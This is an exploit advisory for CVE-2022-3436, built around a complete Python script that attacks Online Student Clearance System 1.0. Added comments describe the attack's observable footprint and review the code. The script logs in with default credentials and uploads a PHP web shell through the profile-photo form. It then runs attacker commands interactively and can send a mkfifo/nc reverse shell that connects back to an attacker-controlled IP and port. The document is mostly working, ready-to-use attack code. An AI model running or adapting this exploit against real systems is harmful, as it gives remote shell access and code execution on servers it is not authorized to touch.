Authored by Akash Pandey

Online Student Clearance System versions 1.0 and below suffer from a remote shell upload vulnerability.

advisories | CVE-2022-3436

#!/usr/bin/python3

# Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated)
# Date: 28/11/2023
# Exploit Author: Akash Pandey aka l3v1ath0n
# Version: <= 1.0
# Tested on: Kali Linux
# CVE : CVE-2022-3436

import requests
import time
import os


# Flat proof-of-concept script: authenticates to the target application,
# uploads a PHP file through the profile-photo form, then drives it
# interactively. The indentation in the published copy was lost; it is
# restored here from the control flow without changing any statement.
#
# Defender's summary of the observable footprint (all taken from the
# requests this script actually issues):
#   * POST login.php with fields txtmatric_no / txtpassword / btnlogin
#   * POST edit-photo.php, multipart field userImage carrying a file
#     named shell.php
#   * repeated GET uploads/shell.php?cmd=<...> from the same session
# Server-side extension/content validation on edit-photo.php and
# disabling script execution under uploads/ each break this chain.
print("""

____ ___ ____ ____ _____ _ _ _____ __
_____ _____ |___ / _ ___ |___ |___ /| || ||___ / / /_
/ __ / / _ _____ __) | | | |__) | __) |____ |_ | || |_ |_ | '_
| (__ V / __/_____/ __/| |_| / __/ / __/_____|__) |__ _|__) | (_) |
___| _/ ___| |_____|___/_____|_____| |____/ |_||____/ ___/

Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️:
Twitter: https://twitter.com/_l3v1ath0n
Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/
""")


web_url = "http://192.168.1.26/student/" # Edit this as per your need
username = "18/132010" # Default Username
password = "11111111" # Default Password
local_ip = "192.168.1.6" # Edit this IP to your local Ip for reverse shell
local_port = "1337" # Port of local machine to connect reverse shell on...
# Named-pipe reverse shell via nc. From a monitoring standpoint, the web
# server process spawning sh/mkfifo/nc is the host-side signal of this stage.
rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f"

# Firing request to login
log_url = web_url+"login.php"

#Telling script to use previous session
# A single Session object keeps the login cookie for every later request.
session = requests.Session()

#Post Body Data for login
post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''}

#Sending request to web server with required post data
response = session.post(log_url,data=post_data)

# Checking Login if Successful:
time.sleep(1)

# Creating a shell file in current directory
# NOTE(review): this leaves shell.php on the operator's own machine; it is
# never removed by the script.
print("[i] Creating a shell file to upload.")

with open("shell.php","w") as file:
    file.write("<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>")
    # NOTE(review): redundant -- the `with` block already closes the file.
    file.close()
time.sleep(1)

print("[i] Checking Login.")

# `response.history` is non-empty only when the login POST was redirected;
# the script treats any redirect as a successful login, so a redirect back
# to the login page (wrong credentials) would presumably also pass this
# check -- confirm against the application's behaviour.
if response.history:
    print("[+] Login Successful.")

    time.sleep(1)

    print("[i] Uploading Shell.")

    # Step 1: Reads the shell.php file in current folder
    # Step 2: Stores the content in filename called shell.php
    # Step 3: Uses the variable name userImage to upload file to server.
    # NOTE(review): the handle returned by open() here is never closed.
    file = {'userImage':('shell.php',open("shell.php","rb"))}

    # Sending payload as POST data to shell.php file
    # The same PHP source is also sent as a plain form field named userImage;
    # whether the server reads this field or only the multipart file cannot
    # be determined from the script.
    payload = {'userImage':"<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>",'btnedit':''}

    # Uploading the malicious php file at below path using files and data values
    # Root cause being exercised: edit-photo.php accepts a .php filename and
    # stores it under a web-reachable uploads/ directory. Note that the
    # script never checks upload_response, so a rejected upload is not
    # detected before the command loop starts.
    upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload)
    print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script")
    # Interactive loop: each line typed is sent as the `cmd` query parameter
    # to the uploaded file; "exit" ends the loop, "netcat" sends rev_shell.
    while True:
        command = input("l3v1ath0n㉿CVE-2022-3436: ")
        if command == "exit":
            break
        elif command == "netcat":
            print("[!] Don't forget to start Netcat Listener")
            time.sleep(3)
            payload = {'cmd':rev_shell}
            cmd = session.get(web_url+"uploads/shell.php?",params=payload)
            print(cmd.text)
        else:
            payload = {'cmd':command}
            cmd = session.get(web_url+"uploads/shell.php?",params=payload)
            print(cmd.text)

    # NOTE(review): "n" here is a literal letter, not a newline escape ("\n").
    print("n[i] Closing this Session")
    session.close()

else:
    print("[-] Login Failed.")